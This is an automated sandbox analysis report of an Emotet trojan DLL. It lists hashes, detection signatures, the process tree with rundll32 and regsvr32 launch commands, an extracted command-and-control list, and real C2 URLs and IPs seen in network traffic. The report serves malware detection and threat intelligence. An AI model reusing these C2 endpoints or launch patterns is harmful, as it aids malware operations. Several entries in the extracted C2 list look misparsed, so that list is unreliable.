Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xhOJLzQSe7

Overview

General Information

Sample Name:xhOJLzQSe7 (renamed file extension from none to dll)
Analysis ID:669375
MD5:2408e1b795944eabc7f184c634b0ed81
SHA1:01f644589eebee027396cc2bc925c07f1dfbd573
SHA256:81875fefda81b8cfa1ab74dfac14d608d01c2cd9f94abb232e2c6c91a63b3682
Tags:32dllexetrojan
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6764 cmdline: loaddll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6772 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6792 cmdline: rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 6780 cmdline: regsvr32.exe /s C:\Users\user\Desktop\xhOJLzQSe7.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 6888 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smcoeugpjqpltwaq\padmvjcc.wwg" MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6808 cmdline: rundll32.exe C:\Users\user\Desktop\xhOJLzQSe7.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7112 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6348 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4572 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6080 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7052 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["136.31.0.0:102", "144.42.251.111:1", "72.67.111.110:3", "255.255.255.255:3", "128.63.180.0:2", "65.83.89.67:68", "64.56.248.2:2", "200.220.252.2:32", "192.153.248.2:48", "1.255.0.0:929", "176.200.250.2:32", "120.16.251.2:48", "26.189.253.2:94", "192.168.2.5:2", "171.213.29.176:4", "212.253.246.49:4", "10.181.2.0:5500", "248.153.248.2:1", "120.4.0.0:1", "252.180.2.0:5516", "168.18.251.2:1", "14.181.2.0:5168", "96.15.251.2:1", "17.181.2.0:5484", "224.18.251.2:1", "23.181.2.0:2584", "48.13.251.2:1", "96.234.0.0:443", "32.17.251.2:1"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.972201454.0000000002F01000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000006.00000002.972201454.0000000002F01000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000002.00000002.471795717.00000000043F1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000002.00000002.471795717.00000000043F1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.465962452.0000000000C01000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.bb0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              3.2.rundll32.exe.bb0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                2.2.regsvr32.exe.c10000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  2.2.regsvr32.exe.c10000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    3.2.rundll32.exe.bb0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 19 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.551.91.76.894981680802404338 07/20/22-01:12:50.117023
                      SID:2404338
                      Source Port:49816
                      Destination Port:8080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.5119.193.124.414982770802404304 07/20/22-01:12:52.851489
                      SID:2404304
                      Source Port:49827
                      Destination Port:7080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: xhOJLzQSe7.dllVirustotal: Detection: 69%Perma Link
                      Antivirus / Scanner detection for submitted sample
                      Source: xhOJLzQSe7.dllAvira: detected
                      Antivirus detection for URL or domain
                      Source: https://51.91.76.89:8080/wILlkzMrsIIqrWuKTJoVXizoHkadIszFHcIlGojhnBcDobePKzyquqAvira URL Cloud: Label: malware
                      Source: https://70.36.102.35/Avira URL Cloud: Label: malware
                      Source: https://70.36.102.35/lKdeDesHKlwQRuBQoJMtzzkSkkKhWjwqAvira URL Cloud: Label: malware
                      Source: https://70.36.102.35/lKdeDesHKlwQRuBQoJMtzzkSkkKhWjwAvira URL Cloud: Label: malware
                      Source: https://51.91.76.89:8080/wILlkzMrsIIqrWuKTJoVXizoHkadIszFHcIlGojhnBcDobePKzyquq9Avira URL Cloud: Label: malware
                      Source: https://51.91.76.89/Avira URL Cloud: Label: malware
                      Source: https://70.36.102.35/DefaultAvira URL Cloud: Label: malware
                      Source: 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["136.31.0.0:102", "144.42.251.111:1", "72.67.111.110:3", "255.255.255.255:3", "128.63.180.0:2", "65.83.89.67:68", "64.56.248.2:2", "200.220.252.2:32", "192.153.248.2:48", "1.255.0.0:929", "176.200.250.2:32", "120.16.251.2:48", "26.189.253.2:94", "192.168.2.5:2", "171.213.29.176:4", "212.253.246.49:4", "10.181.2.0:5500", "248.153.248.2:1", "120.4.0.0:1", "252.180.2.0:5516", "168.18.251.2:1", "14.181.2.0:5168", "96.15.251.2:1", "17.181.2.0:5484", "224.18.251.2:1", "23.181.2.0:2584", "48.13.251.2:1", "96.234.0.0:443", "32.17.251.2:1"]}
                      Source: xhOJLzQSe7.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_10011C86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_10011C86

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 217.182.25.250 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 70.36.102.35 443Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.76.89 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 119.193.124.41 7080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 92.240.254.110 8080Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49816 -> 51.91.76.89:8080
                      Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.5:49827 -> 119.193.124.41:7080
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 136.31.0.0:102
                      Source: Malware configuration extractorIPs: 144.42.251.111:1
                      Source: Malware configuration extractorIPs: 72.67.111.110:3
                      Source: Malware configuration extractorIPs: 255.255.255.255:3
                      Source: Malware configuration extractorIPs: 128.63.180.0:2
                      Source: Malware configuration extractorIPs: 65.83.89.67:68
                      Source: Malware configuration extractorIPs: 64.56.248.2:2
                      Source: Malware configuration extractorIPs: 200.220.252.2:32
                      Source: Malware configuration extractorIPs: 192.153.248.2:48
                      Source: Malware configuration extractorIPs: 1.255.0.0:929
                      Source: Malware configuration extractorIPs: 176.200.250.2:32
                      Source: Malware configuration extractorIPs: 120.16.251.2:48
                      Source: Malware configuration extractorIPs: 26.189.253.2:94
                      Source: Malware configuration extractorIPs: 192.168.2.5:2
                      Source: Malware configuration extractorIPs: 171.213.29.176:4
                      Source: Malware configuration extractorIPs: 212.253.246.49:4
                      Source: Malware configuration extractorIPs: 10.181.2.0:5500
                      Source: Malware configuration extractorIPs: 248.153.248.2:1
                      Source: Malware configuration extractorIPs: 120.4.0.0:1
                      Source: Malware configuration extractorIPs: 252.180.2.0:5516
                      Source: Malware configuration extractorIPs: 168.18.251.2:1
                      Source: Malware configuration extractorIPs: 14.181.2.0:5168
                      Source: Malware configuration extractorIPs: 96.15.251.2:1
                      Source: Malware configuration extractorIPs: 17.181.2.0:5484
                      Source: Malware configuration extractorIPs: 224.18.251.2:1
                      Source: Malware configuration extractorIPs: 23.181.2.0:2584
                      Source: Malware configuration extractorIPs: 48.13.251.2:1
                      Source: Malware configuration extractorIPs: 96.234.0.0:443
                      Source: Malware configuration extractorIPs: 32.17.251.2:1
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: PERFECT-INTERNATIONALUS PERFECT-INTERNATIONALUS
                      Source: Joe Sandbox ViewIP Address: 217.182.25.250 217.182.25.250
                      Source: Joe Sandbox ViewIP Address: 70.36.102.35 70.36.102.35
                      Source: global trafficTCP traffic: 192.168.2.5:49769 -> 92.240.254.110:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49816 -> 51.91.76.89:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49822 -> 217.182.25.250:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49827 -> 119.193.124.41:7080
                      Source: unknownNetwork traffic detected: IP country count 13
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.36.102.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.240.254.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.182.25.250
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.182.25.250
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.182.25.250
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 119.193.124.41
                      Source: svchost.exe, 00000015.00000003.748420075.0000020F4E371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000015.00000003.748420075.0000020F4E371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000015.00000003.748420075.0000020F4E371000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.748444416.0000020F4E382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z||.||58dfb4d5-be7e-424e-8739-cac99224843f||1152921505695035586||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000015.00000003.748420075.0000020F4E371000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.748444416.0000020F4E382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z||.||58dfb4d5-be7e-424e-8739-cac99224843f||1152921505695035586||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000006.00000003.564381173.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972607400.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.840968249.00000257CCC64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.799630816.0000020F4E300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000008.00000002.840794935.00000257CCC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.799488078.0000020F4DAE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: regsvr32.exe, 00000006.00000003.564381173.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972607400.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 00000006.00000003.564381173.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972607400.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.
                      Source: svchost.exe, 00000015.00000003.767387577.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.767327941.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://119.193.124.41/
                      Source: regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972295392.0000000002F3A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPb
                      Source: regsvr32.exe, 00000006.00000002.972295392.0000000002F3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPb#T
                      Source: regsvr32.exe, 00000006.00000002.972295392.0000000002F3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPb1T
                      Source: regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPbV
                      Source: regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://217.182.25.250/
